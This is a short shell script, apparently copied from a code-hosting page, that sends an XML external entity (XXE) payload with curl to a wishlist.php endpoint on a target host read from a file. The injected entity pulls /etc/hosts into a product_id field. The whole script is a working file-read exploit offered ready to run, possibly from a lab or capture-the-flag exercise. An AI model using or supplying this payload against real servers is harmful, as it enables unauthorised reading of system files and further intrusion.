13 lines
305 B
Bash
13 lines
305 B
Bash
![]() |
#!/bin/sh
|
||
|
target=`cat trgt`
|
||
|
curl -iH 'Content-Type: application/xml' "http://$target/wishlist.php" \
|
||
|
-d '<!--?xml version="1.0" ?-->
|
||
|
<!DOCTYPE foo [<!ENTITY payload SYSTEM "/etc/hosts"> ]>
|
||
|
<wishlist>
|
||
|
<user_id>1</user_id>
|
||
|
<item>
|
||
|
<product_id>&payload;</product_id>
|
||
|
</item>
|
||
|
</wishlist>'
|
||
|
|